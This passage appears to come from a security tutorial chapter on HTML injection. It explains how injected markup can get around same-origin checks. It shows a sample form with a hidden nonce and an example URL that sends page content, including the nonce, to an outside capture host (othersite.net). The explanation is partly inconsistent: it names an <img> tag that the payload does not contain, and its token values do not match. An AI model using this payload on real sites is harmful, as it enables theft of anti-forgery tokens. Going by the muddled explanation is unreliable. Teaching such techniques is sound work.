HTML injection

If the same-origin policy states that all the actions need to be performed from a specific domain, we can inject HTML code into any part of the application in order to execute the actions. These HTML injections don't necessarily need to be in a vulnerable field. Sometimes, if we take a look, the injections could be in allowed places. For example, in an email, where we can add some HTML, or in a board message, where we can add HTML in a comment. Let's check out the following code to see an example:

<form action="http://www.testsite.com/action.php" method="POST"> 
<input type="hidden" name="nonce" value="2230313740821"> 
<input type="submit" value="Forward"> 
... 
</form> 
... 
<script> 
var _StatsTrackerId='AABBCCDDEEFF; 
... 
</script>

If we have this vulnerable form, we can try to create an HTML injection by using the <img> tag to add the attack, for example:

http://othersite.net/capture?html=<form%20action="http://www.testsite.com/faction.php"%20method="POST"><input%20type="hidden"%20name="nonce"%20value= "AABBCCDDEEFF"><input%20type="submit"%20value="Forward">...</form>...<script> var%20_StatsTrackerId=

If the application tries to validate the domain, it will be correct, because the request is generated from othersite.net, but the real request is to testsite.com.

Table of Contents for HTML injection

Create new playlist

Sign In

Sign Up

Table of Contents for
HTML injection